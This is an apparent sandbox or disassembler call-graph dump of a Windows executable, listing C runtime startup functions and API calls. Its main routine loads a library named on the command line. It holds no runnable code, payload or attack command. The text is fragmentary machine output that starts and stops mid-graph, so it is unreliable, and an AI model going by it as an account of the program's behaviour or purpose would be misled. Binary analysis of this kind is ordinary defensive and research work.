__crtGetStringTypeA_stat 66 API calls 3984->3987 3985->3984 3993 7135ee __crtGetStringTypeA_stat 66 API calls 3985->3993 4009 713ba0 3985->4009 3999 713c4d 3986->3999 4041 715ae1 3986->4041 3989 713bfa 3987->3989 3991 7135ee __crtGetStringTypeA_stat 66 API calls 3989->3991 3996 713c0d 3991->3996 3992 7135ee __crtGetStringTypeA_stat 66 API calls 3997 713bce 3992->3997 3998 713b95 3993->3998 3994 7135ee __crtGetStringTypeA_stat 66 API calls 3994->3999 3995 713c92 4000 7135ee __crtGetStringTypeA_stat 66 API calls 3995->4000 4003 7135ee __crtGetStringTypeA_stat 66 API calls 3996->4003 4004 7135ee __crtGetStringTypeA_stat 66 API calls 3997->4004 4017 715cbb 3998->4017 3999->3995 4002 7135ee 66 API calls __crtGetStringTypeA_stat 3999->4002 4006 713c98 4000->4006 4001 7135ee __crtGetStringTypeA_stat 66 API calls 4007 713bb6 4001->4007 4002->3999 4008 713c1b 4003->4008 4004->3984 4006->3959 4033 715c76 4007->4033 4011 7135ee __crtGetStringTypeA_stat 66 API calls 4008->4011 4009->4001 4012 713bc1 4009->4012 4011->3986 4012->3992 4129 7129c6 LeaveCriticalSection 4013->4129 4015 712467 4015->3963 4016->3968 4018 715cc8 4017->4018 4032 715d45 4017->4032 4019 715cd9 4018->4019 4020 7135ee __crtGetStringTypeA_stat 66 API calls 4018->4020 4021 715ceb 4019->4021 4022 7135ee __crtGetStringTypeA_stat 66 API calls 4019->4022 4020->4019 4023 715cfd 4021->4023 4024 7135ee __crtGetStringTypeA_stat 66 API calls 4021->4024 4022->4021 4025 715d0f 4023->4025 4026 7135ee __crtGetStringTypeA_stat 66 API calls 4023->4026 4024->4023 4027 715d21 4025->4027 4028 7135ee __crtGetStringTypeA_stat 66 API calls 4025->4028 4026->4025 4029 7135ee __crtGetStringTypeA_stat 66 API calls 4027->4029 4030 715d33 4027->4030 4028->4027 4029->4030 4031 7135ee __crtGetStringTypeA_stat 66 API calls 4030->4031 4030->4032 4031->4032 4032->4009 4034 715c83 4033->4034 4040 715cb7 4033->4040 4035 715c93 4034->4035 4036 7135ee __crtGetStringTypeA_stat 66 API calls 4034->4036 4037 715ca5 4035->4037 4038 7135ee __crtGetStringTypeA_stat 66 API calls 4035->4038 4036->4035 4039 7135ee __crtGetStringTypeA_stat 66 API calls 4037->4039 4037->4040 4038->4037 4039->4040 4040->4012 4042 713c46 4041->4042 4043 715af2 4041->4043 4042->3994 4044 7135ee __crtGetStringTypeA_stat 66 API calls 4043->4044 4045 715afa 4044->4045 4046 7135ee __crtGetStringTypeA_stat 66 API calls 4045->4046 4047 715b02 4046->4047 4048 7135ee __crtGetStringTypeA_stat 66 API calls 4047->4048 4049 715b0a 4048->4049 4050 7135ee __crtGetStringTypeA_stat 66 API calls 4049->4050 4051 715b12 4050->4051 4052 7135ee __crtGetStringTypeA_stat 66 API calls 4051->4052 4053 715b1a 4052->4053 4054 7135ee __crtGetStringTypeA_stat 66 API calls 4053->4054 4055 715b22 4054->4055 4056 7135ee __crtGetStringTypeA_stat 66 API calls 4055->4056 4057 715b29 4056->4057 4058 7135ee __crtGetStringTypeA_stat 66 API calls 4057->4058 4059 715b31 4058->4059 4060 7135ee __crtGetStringTypeA_stat 66 API calls 4059->4060 4061 715b39 4060->4061 4062 7135ee __crtGetStringTypeA_stat 66 API calls 4061->4062 4063 715b41 4062->4063 4064 7135ee __crtGetStringTypeA_stat 66 API calls 4063->4064 4065 715b49 4064->4065 4066 7135ee __crtGetStringTypeA_stat 66 API calls 4065->4066 4067 715b51 4066->4067 4068 7135ee __crtGetStringTypeA_stat 66 API calls 4067->4068 4069 715b59 4068->4069 4070 7135ee __crtGetStringTypeA_stat 66 API calls 4069->4070 4071 715b61 4070->4071 4072 7135ee __crtGetStringTypeA_stat 66 API calls 4071->4072 4073 715b69 4072->4073 4074 7135ee __crtGetStringTypeA_stat 66 API calls 4073->4074 4075 715b71 4074->4075 4076 7135ee __crtGetStringTypeA_stat 66 API calls 4075->4076 4077 715b7c 4076->4077 4078 7135ee __crtGetStringTypeA_stat 66 API calls 4077->4078 4079 715b84 4078->4079 4080 7135ee __crtGetStringTypeA_stat 66 API calls 4079->4080 4081 715b8c 4080->4081 4082 7135ee __crtGetStringTypeA_stat 66 API calls 4081->4082 4083 715b94 4082->4083 4084 7135ee __crtGetStringTypeA_stat 66 API calls 4083->4084 4085 715b9c 4084->4085 4086 7135ee __crtGetStringTypeA_stat 66 API calls 4085->4086 4087 715ba4 4086->4087 4088 7135ee __crtGetStringTypeA_stat 66 API calls 4087->4088 4089 715bac 4088->4089 4090 7135ee __crtGetStringTypeA_stat 66 API calls 4089->4090 4091 715bb4 4090->4091 4092 7135ee __crtGetStringTypeA_stat 66 API calls 4091->4092 4093 715bbc 4092->4093 4094 7135ee __crtGetStringTypeA_stat 66 API calls 4093->4094 4095 715bc4 4094->4095 4096 7135ee __crtGetStringTypeA_stat 66 API calls 4095->4096 4097 715bcc 4096->4097 4098 7135ee __crtGetStringTypeA_stat 66 API calls 4097->4098 4099 715bd4 4098->4099 4100 7135ee __crtGetStringTypeA_stat 66 API calls 4099->4100 4101 715bdc 4100->4101 4102 7135ee __crtGetStringTypeA_stat 66 API calls 4101->4102 4103 715be4 4102->4103 4104 7135ee __crtGetStringTypeA_stat 66 API calls 4103->4104 4105 715bec 4104->4105 4106 7135ee __crtGetStringTypeA_stat 66 API calls 4105->4106 4107 715bf4 4106->4107 4108 7135ee __crtGetStringTypeA_stat 66 API calls 4107->4108 4109 715c02 4108->4109 4110 7135ee __crtGetStringTypeA_stat 66 API calls 4109->4110 4111 715c0d 4110->4111 4112 7135ee __crtGetStringTypeA_stat 66 API calls 4111->4112 4113 715c18 4112->4113 4114 7135ee __crtGetStringTypeA_stat 66 API calls 4113->4114 4115 715c23 4114->4115 4116 7135ee __crtGetStringTypeA_stat 66 API calls 4115->4116 4117 715c2e 4116->4117 4118 7135ee __crtGetStringTypeA_stat 66 API calls 4117->4118 4119 715c39 4118->4119 4120 7135ee __crtGetStringTypeA_stat 66 API calls 4119->4120 4121 715c44 4120->4121 4122 7135ee __crtGetStringTypeA_stat 66 API calls 4121->4122 4123 715c4f 4122->4123 4124 7135ee __crtGetStringTypeA_stat 66 API calls 4123->4124 4125 715c5a 4124->4125 4126 7135ee __crtGetStringTypeA_stat 66 API calls 4125->4126 4127 715c65 4126->4127 4128 7135ee __crtGetStringTypeA_stat 66 API calls 4127->4128 4128->4042 4129->4015 4399 712d3f 4400 713730 __calloc_crt 66 API calls 4399->4400 4401 712d4b 4400->4401 4402 71207e __encode_pointer 6 API calls 4401->4402 4403 712d53 4402->4403 3878 7128fe 3879 712901 3878->3879 3882 7151fb 3879->3882 3883 715221 3882->3883 3884 71521a 3882->3884 3894 712f92 3883->3894 3885 711719 __NMSG_WRITE 66 API calls 3884->3885 3885->3883 3889 715232 __crtGetStringTypeA_stat 3890 71530a 3889->3890 3892 7152ca SetUnhandledExceptionFilter UnhandledExceptionFilter 3889->3892 3918 711697 3890->3918 3892->3890 3895 7120f9 __decode_pointer 6 API calls 3894->3895 3896 712f9d 3895->3896 3896->3889 3897 712f9f 3896->3897 3902 712fab __msize 3897->3902 3898 712fd2 3899 7122cc __getptd_noexit 66 API calls 3898->3899 3907 712fd7 _siglookup 3899->3907 3900 712fe8 3903 7120f9 __decode_pointer 6 API calls 3900->3903 3901 713007 3901->3900 3904 713016 3901->3904 3902->3898 3902->3900 3902->3901 3906 712fce 3902->3906 3903->3907 3905 712c72 __msize 66 API calls 3904->3905 3908 71301b 3905->3908 3906->3898 3906->3904 3910 71307d 3907->3910 3911 711697 _raise 66 API calls 3907->3911 3917 712fe0 __msize 3907->3917 3909 712c0a __msize 6 API calls 3908->3909 3909->3917 3912 712aa0 __lock 66 API calls 3910->3912 3913 713088 3910->3913 3911->3910 3912->3913 3914 7120f0 ___crtMessageBoxW 6 API calls 3913->3914 3915 7130bd 3913->3915 3914->3915 3921 713113 3915->3921 3917->3889 3919 711555 _doexit 66 API calls 3918->3919 3920 7116a8 3919->3920 3922 713120 3921->3922 3923 713119 3921->3923 3922->3917 3925 7129c6 LeaveCriticalSection 3923->3925 3925->3922 4420 711281 4423 71283c 4420->4423 4422 711286 4422->4422 4424 712861 4423->4424 4425 71286e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 4423->4425 4424->4425 4426 712865 4424->4426 4425->4426 4426->4422 4130 711242 4131 711251 4130->4131 4132 711257 4130->4132 4133 711697 _raise 66 API calls 4131->4133 4136 7116bc 4132->4136 4133->4132 4135 71125c __msize 4137 711555 _doexit 66 API calls 4136->4137 4138 7116c7 4137->4138 4138->4135 3190 711104 3227 71264c 3190->3227 3192 711110 GetStartupInfoW 3194 711133 3192->3194 3228 71261b HeapCreate 3194->3228 3196 711183 3230 71248e GetModuleHandleW 3196->3230 3200 711194 __RTC_Initialize 3264 711dde 3200->3264 3201 7110db _fast_error_exit 66 API calls 3201->3200 3203 7111a2 3204 7111ae GetCommandLineW 3203->3204 3338 711411 3203->3338 3279 711d81 GetEnvironmentStringsW 3204->3279 3208 7111bd 3288 711cd3 GetModuleFileNameW 3208->3288 3211 7111d2 3294 711aa4 3211->3294 3212 711411 __amsg_exit 66 API calls 3212->3211 3215 7111e3 3307 7114d0 3215->3307 3216 711411 __amsg_exit 66 API calls 3216->3215 3218 7111ea 3219 7111f5 __wwincmdln 3218->3219 3220 711411 __amsg_exit 66 API calls 3218->3220 3313 711000 CoInitialize CreateMutexW 3219->3313 3220->3219 3222 711216 3223 711224 3222->3223 3327 711681 3222->3327 3345 7116ad 3223->3345 3226 711229 __msize 3227->3192 3229 711177 3228->3229 3229->3196 3330 7110db 3229->3330 3231 7124a2 3230->3231 3232 7124a9 3230->3232 3348 7113e1 3231->3348 3233 712611 3232->3233 3234 7124b3 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 3232->3234 3407 7121a8 3233->3407 3237 7124fc TlsAlloc 3234->3237 3240 711189 3237->3240 3241 71254a TlsSetValue 3237->3241 3240->3200 3240->3201 3241->3240 3242 71255b 3241->3242 3352 7116cb 3242->3352 3247 71207e __encode_pointer 6 API calls 3248 71257b 3247->3248 3249 71207e __encode_pointer 6 API calls 3248->3249 3250 71258b 3249->3250 3251 71207e __encode_pointer 6 API calls 3250->3251 3252 71259b 3251->3252 3369 712924 3252->3369 3259 7120f9 __decode_pointer 6 API calls 3260 7125ef 3259->3260 3260->3233 3261 7125f6 3260->3261 3389 7121e5 3261->3389 3263 7125fe GetCurrentThreadId 3263->3240 3734 71264c 3264->3734 3266 711dea GetStartupInfoA 3267 713730 __calloc_crt 66 API calls 3266->3267 3275 711e0b 3267->3275 3268 712029 __msize 3268->3203 3269 711fa6 GetStdHandle 3272 711f70 3269->3272 3270 713730 __calloc_crt 66 API calls 3270->3275 3271 71200b SetHandleCount 3271->3268 3272->3268 3272->3269 3272->3271 3273 711fb8 GetFileType 3272->3273 3276 71317c __ioinit InitializeCriticalSectionAndSpinCount 3272->3276 3273->3272 3274 711ef3 3274->3268 3274->3272 3277 711f1c GetFileType 3274->3277 3278 71317c __ioinit InitializeCriticalSectionAndSpinCount 3274->3278 3275->3268 3275->3270 3275->3272 3275->3274 3276->3272 3277->3274 3278->3274 3280 711d92 3279->3280 3281 711d96 3279->3281 3280->3208 3283 7136eb __malloc_crt 66 API calls 3281->3283 3284 711db7 3283->3284 3285 711dbe FreeEnvironmentStringsW 3284->3285 3735 7137f0 3284->3735 3285->3208 3289 711d08 _wparse_cmdline 3288->3289 3290 7111c7 3289->3290 3291 711d45 3289->3291 3290->3211 3290->3212 3292 7136eb __malloc_crt 66 API calls 3291->3292 3293 711d4b _wparse_cmdline 3292->3293 3293->3290 3295 711abc _wcslen 3294->3295 3299 7111d8 3294->3299 3296 713730 __calloc_crt 66 API calls 3295->3296 3302 711ae0 _wcslen 3296->3302 3297 711b45 3298 7135ee __crtGetStringTypeA_stat 66 API calls 3297->3298 3298->3299 3299->3215 3299->3216 3300 713730 __calloc_crt 66 API calls 3300->3302 3301 711b6b 3303 7135ee __crtGetStringTypeA_stat 66 API calls 3301->3303 3302->3297 3302->3299 3302->3300 3302->3301 3305 711b2a 3302->3305 3739 71367c 3302->3739 3303->3299 3305->3302 3306 712ae2 __invoke_watson 10 API calls 3305->3306 3306->3305 3308 7114de __IsNonwritableInCurrentImage 3307->3308 3748 712dc3 3308->3748 3310 7114fc __initterm_e 3312 71151b __IsNonwritableInCurrentImage __initterm 3310->3312 3752 712dac 3310->3752 3312->3218 3314 711035 GetCommandLineW CommandLineToArgvW 3313->3314 3315 71101f GetLastError 3313->3315 3317 711067 3314->3317 3318 711056 PathFileExistsW 3314->3318 3315->3314 3316 71102c 3315->3316 3316->3222 3320 711084 LoadLibraryW 3317->3320 3318->3317 3319 71106e PathFileExistsW 3318->3319 3319->3317 3319->3320 3321 711091 GetProcAddress 3320->3321 3322 7110aa CloseHandle CoUninitialize 3320->3322 3323 7110a1 3321->3323 3324 7110a3 FreeLibrary 3321->3324 3325 7110c2 3322->3325 3326 7110bb LocalFree 3322->3326 3323->3324 3324->3322 3325->3222 3326->3325 3853 711555 3327->3853 3329 711692 3329->3223 3331 7110e9 3330->3331 3332 7110ee 3330->3332 3333 7118c4 __FF_MSGBANNER 66 API calls 3331->3333 3334 711719 __NMSG_WRITE 66 API calls 3332->3334 3333->3332 3335 7110f6 3334->3335 3336 711465 _doexit 3 API calls 3335->3336 3337 711100 3336->3337 3337->3196 3339 7118c4 __FF_MSGBANNER 66 API calls 3338->3339 3340 71141b 3339->3340 3341 711719 __NMSG_WRITE 66 API calls 3340->3341 3342 711423 3341->3342 3343 7120f9 __decode_pointer 6 API calls 3342->3343 3344 7111ad 3343->3344 3344->3204 3346 711555 _doexit 66 API calls 3345->3346 3347 7116b8 3346->3347 3347->3226 3349 7113ec Sleep GetModuleHandleW 3348->3349 3350 71140a 3349->3350 3351 71140e 3349->3351 3350->3349 3350->3351 3351->3232 3418 7120f0 3352->3418 3354 7116d3 __init_pointers __initp_misc_winsig 3421 712913 3354->3421 3357 71207e __encode_pointer 6 API calls 3358 71170f 3357->3358 3359 71207e TlsGetValue 3358->3359 3360 7120b7 GetModuleHandleW 3359->3360 3361 712096 3359->3361 3363 7120d2 GetProcAddress 3360->3363 3364 7120c7 3360->3364 3361->3360 3362 7120a0 TlsGetValue 3361->3362 3366 7120ab 3362->3366 3368 7120af 3363->3368 3365 7113e1 __crt_waiting_on_module_handle 2 API calls 3364->3365 3367 7120cd 3365->3367 3366->3360 3366->3368 3367->3363 3367->3368 3368->3247 3370 71292f 3369->3370 3372 7125a8 3370->3372 3424 71317c 3370->3424 3372->3233 3373 7120f9 TlsGetValue 3372->3373 3374 712111 3373->3374 3375 712132 GetModuleHandleW 3373->3375 3374->3375 3378 71211b TlsGetValue 3374->3378 3376 712142 3375->3376 3377 71214d GetProcAddress 3375->3377 3379 7113e1 __crt_waiting_on_module_handle 2 API calls 3376->3379 3380 71212a 3377->3380 3382 712126 3378->3382 3381 712148 3379->3381 3380->3233 3383 713730 3380->3383 3381->3377 3381->3380 3382->3375 3382->3380 3386 713739 3383->3386 3385 7125d5 3385->3233 3385->3259 3386->3385 3387 713757 Sleep 3386->3387 3429 71557f 3386->3429 3388 71376c 3387->3388 3388->3385 3388->3386 3713 71264c 3389->3713 3391 7121f1 GetModuleHandleW 3392 712201 3391->3392 3393 712207 3391->3393 3394 7113e1 __crt_waiting_on_module_handle 2 API calls 3392->3394 3395 712243 3393->3395 3396 71221f GetProcAddress GetProcAddress 3393->3396 3394->3393 3397 712aa0 __lock 62 API calls 3395->3397 3396->3395 3398 712262 InterlockedIncrement 3397->3398 3714 7122ba 3398->3714 3401 712aa0 __lock 62 API calls 3402 712283 3401->3402 3717 713c9e InterlockedIncrement 3402->3717 3404 7122a1 3729 7122c3 3404->3729 3406 7122ae __msize 3406->3263 3408 7121b2 3407->3408 3409 7121be 3407->3409 3410 7120f9 __decode_pointer 6 API calls 3408->3410 3411 7121e0 3409->3411 3412 7121d2 TlsFree 3409->3412 3410->3409 3413 71298b DeleteCriticalSection 3411->3413 3415 7129a3 3411->3415 3412->3411 3414 7135ee __crtGetStringTypeA_stat 66 API calls 3413->3414 3414->3411 3416 7129b5 DeleteCriticalSection 3415->3416 3417 7129c3 3415->3417 3416->3415 3417->3240 3419 71207e __encode_pointer 6 API calls 3418->3419 3420 7120f7 3419->3420 3420->3354 3422 71207e __encode_pointer 6 API calls 3421->3422 3423 711705 3422->3423 3423->3357 3428 71264c 3424->3428 3426 713188 InitializeCriticalSectionAndSpinCount 3427 7131cc __msize 3426->3427 3427->3370 3428->3426 3430 71558b __msize 3429->3430 3431 7155a3 3430->3431 3441 7155c2 __crtGetStringTypeA_stat 3430->3441 3442 712c72 3431->3442 3434 715634 HeapAlloc 3434->3441 3438 7155b8 __msize 3438->3386 3441->3434 3441->3438 3448 712aa0 3441->3448 3455 714dc3 3441->3455 3461 71567b 3441->3461 3464 7131eb 3441->3464 3467 7122cc GetLastError 3442->3467 3444 712c77 3445 712c0a 3444->3445 3446 7120f9 __decode_pointer 6 API calls 3445->3446 3447 712c1a __invoke_watson 3446->3447 3449 712ab5 3448->3449 3450 712ac8 EnterCriticalSection 3448->3450 3509 7129dd 3449->3509 3450->3441 3452 712abb 3452->3450 3453 711411 __amsg_exit 65 API calls 3452->3453 3454 712ac7 3453->3454 3454->3450 3458 714df1 3455->3458 3456 714e8a 3460 714e93 3456->3460 3708 7149da 3456->3708 3458->3456 3458->3460 3701 71492a 3458->3701 3460->3441 3712 7129c6 LeaveCriticalSection 3461->3712 3463 715682 3463->3441 3465 7120f9 __decode_pointer 6 API calls 3464->3465 3466 7131fb 3465->3466 3466->3441 3481 712174 TlsGetValue 3467->3481 3470 712339 SetLastError 3470->3444 3471 713730 __calloc_crt 63 API calls 3472 7122f7 3471->3472 3472->3470 3473 7120f9 __decode_pointer 6 API calls 3472->3473 3474 712311 3473->3474 3475 712330 3474->3475 3476 712318 3474->3476 3486 7135ee 3475->3486 3478 7121e5 __mtinit 63 API calls 3476->3478 3480 712320 GetCurrentThreadId 3478->3480 3479 712336 3479->3470 3480->3470 3482 7121a4 3481->3482 3483 712189 3481->3483 3482->3470 3482->3471 3484 7120f9 __decode_pointer 6 API calls 3483->3484 3485 712194 TlsSetValue 3484->3485 3485->3482 3488 7135fa __msize 3486->3488 3487 713673 _realloc __msize 3487->3479 3488->3487 3489 713639 3488->3489 3491 712aa0 __lock 64 API calls 3488->3491 3489->3487 3490 71364e HeapFree 3489->3490 3490->3487 3492 713660 3490->3492 3495 713611 ___sbh_find_block 3491->3495 3493 712c72 __msize 64 API calls 3492->3493 3494 713665 GetLastError 3493->3494 3494->3487 3496 71362b 3495->3496 3499 714614 3495->3499 3505 713644 3496->3505 3500 714653 3499->3500 3504 7148f5 ___sbh_free_block 3499->3504 3501 71483f VirtualFree 3500->3501 3500->3504 3502 7148a3 3501->3502 3503 7148b2 VirtualFree HeapFree 3502->3503 3502->3504 3503->3504 3504->3496 3508 7129c6 LeaveCriticalSection 3505->3508 3507 71364b 3507->3489 3508->3507 3510 7129e9 __msize 3509->3510 3511 712a0f 3510->3511 3535 7118c4 3510->3535 3517 712a1f __msize 3511->3517 3581 7136eb 3511->3581 3517->3452 3519 712a31 3522 712c72 __msize 66 API calls 3519->3522 3520 712a40 3523 712aa0 __lock 66 API calls 3520->3523 3522->3517 3524 712a47 3523->3524 3525 712a7b 3524->3525 3526 712a4f 3524->3526 3528 7135ee __crtGetStringTypeA_stat 66 API calls 3525->3528 3527 71317c __ioinit InitializeCriticalSectionAndSpinCount 3526->3527 3529 712a5a 3527->3529 3530 712a6c 3528->3530 3529->3530 3531 7135ee __crtGetStringTypeA_stat 66 API calls 3529->3531 3586 712a97 3530->3586 3533 712a66 3531->3533 3534 712c72 __msize 66 API calls 3533->3534 3534->3530 3589 7135a3 3535->3589 3538 7118d8 3540 711719 __NMSG_WRITE 66 API calls 3538->3540 3542 7118fa 3538->3542 3539 7135a3 __set_error_mode 66 API calls 3539->3538 3541 7118f0 3540->3541 3543 711719 __NMSG_WRITE 66 API calls 3541->3543 3544 711719 3542->3544 3543->3542 3545 71172d 3544->3545 3546 7135a3 __set_error_mode 63 API calls 3545->3546 3577 711888 3545->3577 3547 71174f 3546->3547 3548 71188d GetStdHandle 3547->3548 3550 7135a3 __set_error_mode 63 API calls 3547->3550 3549 71189b _strlen 3548->3549 3548->3577 3553 7118b4 WriteFile 3549->3553 3549->3577 3551 711760 3550->3551 3551->3548 3552 711772 3551->3552 3552->3577 3595 71353b 3552->3595 3553->3577 3556 7117a8 GetModuleFileNameA 3558 7117c6 3556->3558 3563 7117e9 _strlen 3556->3563 3560 71353b _strcpy_s 63 API calls 3558->3560 3561 7117d6 3560->3561 3561->3563 3564 712ae2 __invoke_watson 10 API calls 3561->3564 3562 71182c 3620 71337c 3562->3620 3563->3562 3611 7133f0 3563->3611 3564->3563 3569 711850 3571 71337c _strcat_s 63 API calls 3569->3571 3570 712ae2 __invoke_watson 10 API calls 3570->3569 3573 711864 3571->3573 3572 712ae2 __invoke_watson 10 API calls 3572->3562 3574 711875 3573->3574 3575 712ae2 __invoke_watson 10 API calls 3573->3575 3629 713213 3574->3629 3575->3574 3578 711465 3577->3578 3667 71143a GetModuleHandleW 3578->3667 3583 7136f4 3581->3583 3584 712a2a 3583->3584 3585 71370b Sleep 3583->3585 3671 7154b5 3583->3671 3584->3519 3584->3520 3585->3583 3700 7129c6 LeaveCriticalSection 3586->3700 3588 712a9e 3588->3517 3590 7135b2 3589->3590 3591 7118cb 3590->3591 3592 712c72 __msize 66 API calls 3590->3592 3591->3538 3591->3539 3593 7135d5 3592->3593 3594 712c0a __msize 6 API calls 3593->3594 3594->3591 3596 71354c 3595->3596 3598 713553 3595->3598 3596->3598 3602 713579 3596->3602 3597 712c72 __msize 66 API calls 3599 713558 3597->3599 3598->3597 3600 712c0a __msize 6 API calls 3599->3600 3601 711794 3600->3601 3601->3556 3604 712ae2 3601->3604 3602->3601 3603 712c72 __msize 66 API calls 3602->3603 3603->3599 3656 715320 3604->3656 3606 712b0f IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 3607 712beb GetCurrentProcess TerminateProcess 3606->3607 3608 712bdf __invoke_watson 3606->3608 3658 7110cc 3607->3658 3608->3607 3610 7117a5 3610->3556 3612 713402 3611->3612 3615 713406 3612->3615 3617 711819 3612->3617 3618 71344c 3612->3618 3613 712c72 __msize 66 API calls 3614 713422 3613->3614 3616 712c0a __msize 6 API calls 3614->3616 3615->3613 3615->3617 3616->3617 3617->3562 3617->3572 3618->3617 3619 712c72 __msize 66 API calls 3618->3619 3619->3614 3621 713394 3620->3621 3622 71338d 3620->3622 3623 712c72 __msize 66 API calls 3621->3623 3622->3621 3626 7133c8 3622->3626 3628 713399 3623->3628 3624 712c0a __msize 6 API calls 3625 71183f 3624->3625 3625->3569 3625->3570 3626->3625 3627 712c72 __msize 66 API calls 3626->3627 3627->3628 3628->3624 3630 7120f0 ___crtMessageBoxW 6 API calls 3629->3630 3631 713223 3630->3631 3632 713236 LoadLibraryA 3631->3632 3655 7132be 3631->3655 3633 713360 3632->3633 3634 71324b GetProcAddress 3632->3634 3633->3577 3634->3633 3636 713261 3634->3636 3635 713313 3638 7120f9 __decode_pointer 6 API calls 3635->3638 3637 71207e __encode_pointer 6 API calls 3636->3637 3641 713267 GetProcAddress 3637->3641 3638->3633 3639 7120f9 __decode_pointer 6 API calls 3649 71332b 3639->3649 3640 7120f9 __decode_pointer 6 API calls 3642 7132db 3640->3642 3644 71207e __encode_pointer 6 API calls 3641->3644 3643 7120f9 __decode_pointer 6 API calls 3642->3643 3647 7132e8 3643->3647 3645 71327c GetProcAddress 3644->3645 3646 71207e __encode_pointer 6 API calls 3645->3646 3648 713291 GetProcAddress 3646->3648 3647->3635 3647->3639 3650 71207e __encode_pointer 6 API calls 3648->3650 3649->3635 3651 7120f9 __decode_pointer 6 API calls 3649->3651 3652 7132a6 3650->3652 3651->3635 3653 7132b0 GetProcAddress 3652->3653 3652->3655 3654 71207e __encode_pointer 6 API calls 3653->3654 3654->3655 3655->3640 3655->3647 3657 71532c __VEC_memzero 3656->3657 3657->3606 3659 7110d4 3658->3659 3660 7110d6 IsDebuggerPresent 3658->3660 3659->3610 3666 7128d2 3660->3666 3663 711358 SetUnhandledExceptionFilter UnhandledExceptionFilter 3664 711375 __invoke_watson 3663->3664 3665 71137d GetCurrentProcess TerminateProcess 3663->3665 3664->3665 3665->3610 3666->3663 3668 711463 ExitProcess 3667->3668 3669 71144e GetProcAddress 3667->3669 3669->3668 3670 71145e 3669->3670 3670->3668 3672 715568 3671->3672 3681 7154c7 3671->3681 3673 7131eb __calloc_impl 6 API calls 3672->3673 3674 71556e 3673->3674 3676 712c72 __msize 65 API calls 3674->3676 3675 7118c4 __FF_MSGBANNER 65 API calls 3675->3681 3687 715560 3676->3687 3678 711719 __NMSG_WRITE 65 API calls 3678->3681 3679 715524 HeapAlloc 3679->3681 3680 711465 _doexit 3 API calls 3680->3681 3681->3675 3681->3678 3681->3679 3681->3680 3682 715554 3681->3682 3683 7131eb __calloc_impl 6 API calls 3681->3683 3685 715559 3681->3685 3681->3687 3688 715466 3681->3688 3684 712c72 __msize 65 API calls 3682->3684 3683->3681 3684->3685 3686 712c72 __msize 65 API calls 3685->3686 3686->3687 3687->3583 3689 715472 __msize 3688->3689 3690 7154a3 __msize 3689->3690 3691 712aa0 __lock 66 API calls 3689->3691 3690->3681 3692 715488 3691->3692 3693 714dc3 ___sbh_alloc_block 5 API calls 3692->3693 3694 715493 3693->3694 3696 7154ac 3694->3696 3699 7129c6 LeaveCriticalSection 3696->3699 3698 7154b3 3698->3690 3699->3698 3700->3588 3702 714971 HeapAlloc 3701->3702 3703 71493d HeapReAlloc 3701->3703 3704 714994 VirtualAlloc 3702->3704 3705 71495b 3702->3705 3703->3705 3706 71495f 3703->3706 3704->3705 3707 7149ae HeapFree 3704->3707 3705->3456 3706->3702 3707->3705 3709 7149f1 VirtualAlloc 3708->3709 3711 714a38 3709->3711 3711->3460 3712->3463 3713->3391 3732 7129c6 LeaveCriticalSection 3714->3732 3716 71227c 3716->3401 3718 713cbc InterlockedIncrement 3717->3718 3719 713cbf 3717->3719 3718->3719 3720 713cc9 InterlockedIncrement 3719->3720 3721 713ccc 3719->3721 3720->3721 3722 713cd6 InterlockedIncrement 3721->3722 3723 713cd9 3721->3723 3722->3723 3724 713ce3 InterlockedIncrement 3723->3724 3726 713ce6 3723->3726 3724->3726 3725 713cff InterlockedIncrement 3725->3726 3726->3725 3727 713d0f InterlockedIncrement 3726->3727 3728 713d1a InterlockedIncrement 3726->3728 3727->3726 3728->3404 3733 7129c6 LeaveCriticalSection 3729->3733 3731 7122ca 3731->3406 3732->3716 3733->3731 3734->3266 3736 713808 3735->3736 3737 711dd3 3736->3737 3738 71382f __VEC_memcpy 3736->3738 3737->3285 3738->3737 3740 713694 3739->3740 3741 71368d 3739->3741 3742 712c72 __msize 66 API calls 3740->3742 3741->3740 3743 7136c0 3741->3743 3747 713699 3742->3747 3745 7136a8 3743->3745 3746 712c72 __msize 66 API calls 3743->3746 3744 712c0a __msize 6 API calls 3744->3745 3745->3302 3746->3747 3747->3744 3749 712dc9 3748->3749 3750 71207e __encode_pointer 6 API calls 3749->3750 3751 712de1 3749->3751 3750->3749 3751->3310 3755 712d70 3752->3755 3754 712db9 3754->3312 3756 712d7c __msize 3755->3756 3763 71147d 3756->3763 3762 712d9d __msize 3762->3754 3764 712aa0 __lock 66 API calls 3763->3764 3765 711484 3764->3765 3766 712c85 3765->3766 3767 7120f9 __decode_pointer 6 API calls 3766->3767 3768 712c99 3767->3768 3769 7120f9 __decode_pointer 6 API calls 3768->3769 3770 712ca9 3769->3770 3771 712d2c 3770->3771 3786 71539a 3770->3786 3783 712da6 3771->3783 3773 712d13 3774 71207e __encode_pointer 6 API calls 3773->3774 3775 712d21 3774->3775 3779 71207e __encode_pointer 6 API calls 3775->3779 3776 712ceb 3776->3771 3780 71377c __realloc_crt 73 API calls 3776->3780 3781 712d01 3776->3781 3777 712cc7 3777->3773 3777->3776 3799 71377c 3777->3799 3779->3771 3780->3781 3781->3771 3782 71207e __encode_pointer 6 API calls 3781->3782 3782->3773 3849 711486 3783->3849 3787 7153a6 __msize 3786->3787 3788 7153b6 3787->3788 3791 7153d3 3787->3791 3789 712c72 __msize 66 API calls 3788->3789 3792 7153bb 3789->3792 3790 715414 HeapSize 3795 7153cb __msize 3790->3795 3791->3790 3793 712aa0 __lock 66 API calls 3791->3793 3794 712c0a __msize 6 API calls 3792->3794 3796 7153e3 ___sbh_find_block 3793->3796 3794->3795 3795->3777 3804 715434 3796->3804 3803 713785 3799->3803 3801 7137c4 3801->3776 3802 7137a5 Sleep 3802->3803 3803->3801 3803->3802 3808 71569d 3803->3808 3807 7129c6 LeaveCriticalSection 3804->3807 3806 71540f 3806->3790 3806->3795 3807->3806 3809 7156a9 __msize 3808->3809 3810 7156b0 3809->3810 3811 7156be 3809->3811 3812 7154b5 _malloc 66 API calls 3810->3812 3813 7156d1 3811->3813 3814 7156c5 3811->3814 3835 7156b8 _realloc __msize 3812->3835 3820 715843 3813->3820 3833 7156de ___sbh_resize_block ___sbh_find_block 3813->3833 3815 7135ee __crtGetStringTypeA_stat 66 API calls 3814->3815 3815->3835 3816 715876 3818 7131eb __calloc_impl 6 API calls 3816->3818 3817 715848 HeapReAlloc 3817->3820 3817->3835 3821 71587c 3818->3821 3819 712aa0 __lock 66 API calls 